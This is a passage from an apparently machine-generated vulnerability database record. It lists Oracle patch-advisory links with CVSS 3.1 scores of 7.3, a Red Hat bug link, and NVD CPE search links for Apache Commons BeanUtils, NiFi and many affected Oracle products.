reference_url https://www.oracle.com/security-alerts/cpuapr2022.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuapr2022.html
92
reference_url https://www.oracle.com/security-alerts/cpujan2020.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2020.html
93
reference_url https://www.oracle.com/security-alerts/cpujan2021.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2021.html
94
reference_url https://www.oracle.com/security-alerts/cpujan2022.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2022.html
95
reference_url https://www.oracle.com/security-alerts/cpujul2020.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujul2020.html
96
reference_url https://www.oracle.com//security-alerts/cpujul2021.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com//security-alerts/cpujul2021.html
97
reference_url https://www.oracle.com/security-alerts/cpujul2022.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujul2022.html
98
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2021.html
99
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1767483
reference_id 1767483
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1767483
100
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:commons_beanutils:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:apache:commons_beanutils:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:commons_beanutils:*:*:*:*:*:*:*:*
101
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:nifi:1.14.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:apache:nifi:1.14.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:nifi:1.14.0:*:*:*:*:*:*:*
102
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:nifi:1.15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:apache:nifi:1.15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:nifi:1.15.0:*:*:*:*:*:*:*
103
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*
104
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*
105
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
106
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.5:*:*:*:*:e-business_suite:*:*
reference_id cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.5:*:*:*:*:e-business_suite:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.5:*:*:*:*:e-business_suite:*:*
107
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.5:*:*:*:*:sap:*:*
reference_id cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.5:*:*:*:*:sap:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.5:*:*:*:*:sap:*:*
108
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.6:*:*:*:*:e-business_suite:*:*
reference_id cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.6:*:*:*:*:e-business_suite:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.6:*:*:*:*:e-business_suite:*:*
109
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.6:*:*:*:*:sap:*:*
reference_id cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.6:*:*:*:*:sap:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_product_lifecycle_management_integration_pack:3.6:*:*:*:*:sap:*:*
110
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*
111
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:2.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_platform:2.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:2.4.0:*:*:*:*:*:*:*
112
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:2.7.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_platform:2.7.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:2.7.1:*:*:*:*:*:*:*
113
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:2.9.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_platform:2.9.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:2.9.0:*:*:*:*:*:*:*
114
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*
115
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*
116
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*
117
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_billing_and_revenue_management_elastic_charging_engine:11.3.0.9:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_billing_and_revenue_management_elastic_charging_engine:11.3.0.9:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_billing_and_revenue_management_elastic_charging_engine:11.3.0.9:*:*:*:*:*:*:*
118
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_billing_and_revenue_management_elastic_charging_engine:12.0.0.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_billing_and_revenue_management_elastic_charging_engine:12.0.0.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_billing_and_revenue_management_elastic_charging_engine:12.0.0.3:*:*:*:*:*:*:*
119
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_cloud_native_core_console:1.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_cloud_native_core_console:1.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_cloud_native_core_console:1.4.0:*:*:*:*:*:*:*
120
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.9.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.9.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.9.0:*:*:*:*:*:*:*
121
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_cloud_native_core_unified_data_repository:1.6.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_cloud_native_core_unified_data_repository:1.6.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_cloud_native_core_unified_data_repository:1.6.0:*:*:*:*:*:*:*
122
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_convergence:3.0.2.2.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_convergence:3.0.2.2.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_convergence:3.0.2.2.0:*:*:*:*:*:*:*
123
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_design_studio:7.3.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_design_studio:7.3.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_design_studio:7.3.4:*:*:*:*:*:*:*
124
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_design_studio:7.3.5:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_design_studio:7.3.5:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_design_studio:7.3.5:*:*:*:*:*:*:*
125
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_design_studio:7.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_design_studio:7.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_design_studio:7.4.0:*:*:*:*:*:*:*
126
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
127
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_metasolv_solution:6.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_metasolv_solution:6.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_metasolv_solution:6.3.0:*:*:*:*:*:*:*
128
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_metasolv_solution:6.3.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_metasolv_solution:6.3.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_metasolv_solution:6.3.1:*:*:*:*:*:*:*
129
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*
130
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_performance_intelligence_center:10.4.0.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_performance_intelligence_center:10.4.0.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_performance_intelligence_center:10.4.0.3:*:*:*:*:*:*:*
131
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.3.0:*:*:*:*:*:*:*
132
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.4:*:*:*:*:*:*:*
133
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.5:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.5:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.5:*:*:*:*:*:*:*
134
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*
135
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*
136
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*
137
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.4.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.4.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.4.0.0:*:*:*:*:*:*:*
138
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7:*:*:*:*:*:*:*
139
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8:*:*:*:*:*:*:*
140
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*
141
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*
142
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:fusion_middleware:11.1.1.9:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:fusion_middleware:11.1.1.9:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:fusion_middleware:11.1.1.9:*:*:*:*:*:*:*
143
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:fusion_middleware:12.2.1.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:fusion_middleware:12.2.1.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:fusion_middleware:12.2.1.3.0:*:*:*:*:*:*:*
144
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
145
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:healthcare_foundation:7.1.5:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:healthcare_foundation:7.1.5:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:healthcare_foundation:7.1.5:*:*:*:*:*:*:*
146
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:*
147
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:*
148
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:healthcare_foundation:7.3.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:healthcare_foundation:7.3.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:healthcare_foundation:7.3.1:*:*:*:*:*:*:*
149
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:healthcare_foundation:8.0.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:healthcare_foundation:8.0.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:healthcare_foundation:8.0.1:*:*:*:*:*:*:*
150
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:hospitality_opera_5:5.5:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:hospitality_opera_5:5.5:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:hospitality_opera_5:5.5:*:*:*:*:*:*:*
151
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:hospitality_opera_5:5.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:hospitality_opera_5:5.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:hospitality_opera_5:5.6:*:*:*:*:*:*:*
152
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:hospitality_reporting_and_analytics:9.1.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:hospitality_reporting_and_analytics:9.1.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:hospitality_reporting_and_analytics:9.1.0:*:*:*:*:*:*:*
153
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:insurance_data_gateway:1.0.2.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:insurance_data_gateway:1.0.2.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:insurance_data_gateway:1.0.2.3:*:*:*:*:*:*:*
154
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
155
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:9.2.5.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:9.2.5.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:9.2.5.3:*:*:*:*:*:*:*
156
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
reference_type
scores
